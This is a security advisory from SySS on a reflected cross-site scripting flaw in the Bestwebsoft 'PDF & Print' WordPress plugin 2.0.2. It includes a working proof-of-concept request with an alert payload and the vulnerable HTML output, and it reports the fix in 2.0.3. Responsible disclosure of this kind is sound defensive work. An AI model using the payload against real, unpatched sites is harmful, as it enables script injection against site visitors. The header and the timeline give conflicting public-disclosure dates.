[SYSS-2018-014] Bestwebsoft PDF & Print - Cross-Site Scripting

From: Robin.Trost@syss.de
To: bugtraq@securityfocus.com
Cc:
Subject: [SYSS-2018-014] Bestwebsoft PDF & Print - Cross-Site Scripting
Date:


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2018-014
Product: PDF & Print
Manufacturer: Bestwebsoft
Affected Version: 2.0.2
Tested Version: 2.0.2
Vulnerability Type: Cross-Site-Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2018-08-24
Solution Date: 2018-09-13
Public Disclosure: 2018-09-28
CVE Reference: -
Author of Advisory: Robin Trost, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

PDF & Print is a Wordpress Plugin which allows a user to generate a PDF 
file from the Blog post or print it. 

The manufacturer describes the product as follows (see [1]):

"With this plugin you can create PDF files and print pages quickly.
Add PDF & print buttons to WordPress website pages, posts, and widgets.
Generate documents with custom styles and useful data for archiving, 
sharing, or saving."

Due to improper encoding the plugin is vulnerable to reflected
cross-site scripting attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The called URL gets reflected in the <href> tag for the "View PDF" and 
"Print Content" Buttons.
Because the GET-parameter names did not get encoded it is possible to 
execute JavaScript trough the URL.

The  value of the GET-parameter is encoded correctly, but the name of 
the GET-parameter is not encoded which leads to the 
Cross-Site-Scripting.

This vulnerability affects all Blog Posts or Wordpress Sites where the
"View PDF" or "Print Content" Button is displayed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):


GET /index.php/2018/07/25/hello-world/?param1=10"><&10"><script>alert
(10);</script><href=" HTTP/1.1
[...]


That request results in the <script> tag from the URI Path being 
embedded in the response in two places so that a browser will execute 
the JavaScript code.


[...]
<div class="pdfprnt-buttons pdfprnt-buttons-post pdfprnt-top-right">
      <a href="http://<WORDPRESS BASE URL>/index.php/2018/07/25/hello-
       world/?param1=10%5C%22%3E%3C&10"><script>alert(10);</script><href="
   &print=pdf" class="pdfprnt-button pdfprnt-button-pdf" target=
  "_blank">
           <img src="http://<WORDPRESS BASE URL>/wp-content/plugins/
              pdf-print/images/pdf.png" alt="image_pdf" title="View PDF" />
        </a>
     <a href="http://<WORDPRESS BASE URL>/index.php/2018/07/25/hello-
       world/?param1=10%5C%22%3E%3C&10"><script>alert(10);</script><href="
   &print=print" class="pdfprnt-button pdfprnt-button-print" target=
      "_blank">
           <img src="http://<WORDPRESS BASE URL>/wp-content/plugins/
              pdf-print/images/print.png" alt="image_print" title="Print
             Content" />
      </a>
</div>
[...]


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to version 2.0.3 of PDF & Print

More Information:

https://bestwebsoft.com/products/wordpress/plugins/pdf-print/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-07-25: Vulnerability discovered
2018-08-24: Vulnerability reported to manufacturer
2018-09-13: Patch released by manufacturer
2018-10-28: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for PDF & Print
    https://bestwebsoft.com/products/wordpress/plugins/pdf-print/
[2] SySS Security Advisory SYSS-2018-014
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/
    SYSS-2018-014.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Robin Trost of SySS
GmbH.

E-Mail: robin.trost at syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/
Robin_Trost.asc
Key ID: 0x698E6EB3
Key Fingerprint: 85FE 80E2 04F3 6177 C61A 4618 61DE F14F 698E 6EB3

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEhf6A4gTzYXfGGkYYYd7xT2mObrMFAlut4ccACgkQYd7xT2mO
brObOhAAl+WrB0zN0LquBAIPenAln2KyyeyoIVlIqavqfnop/t5RHruZdY1KVAQ6
0kcTLi/177eAE0Wzwi6GZunfLKiYR4yHdSQEKJ3FUCxY/sj9SvgQQFS7+3bKZRsw
ojTG+0J9yklBmVZwBmIoV77Ca9d5qgd44tvfff3OCV1zsIPE91FYb8gNsT7MRHwp
3aw7tFd9xjwpoV/aERXPEURPrGCWC71SS0r5M1aEh5n65gF77HecWZeB2LNodJpI
Q5AHd+8fRtfdagLaBe4ws9qQdB+M7FqUcCPSXnRBsyBSr/4DRa1cl5I/i3AMr81K
m82tmGtflk62YPTQ0EXINw7LLvFOX0sSTK8z/M6vii3O6aBu03Aj1irlixZqDJa5
CTRvXBBXzA35oUJw9Usi+RjG+90PTizOd5HetDWx4k5UEdnYWwNlICN9iIBZHPOo
1b7yqX9E7FIB8elgjphaNpAr2NHyWZS0MeFNi7MAemfWWkrV4st6uHXYJYzvueNH
LnUff8QrE3sVWR+6n7PH+c9IcSU9QvCZg67U0Sg90CSs87eTHLE+IHJ2VmycXTm+
IWPR7EU5PYUMsm8MzcCYNjE4Bxq0Jwx5w8/MXKi0PXvCCrf+zR8Y/bjBaoAy4PUy
s7Z80TFrzQVy4r6xzyWOzJTKe+5ncjWLZYrkAsVGr+W+zhQsGFQ=
=bW9N
-----END PGP SIGNATURE-----





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.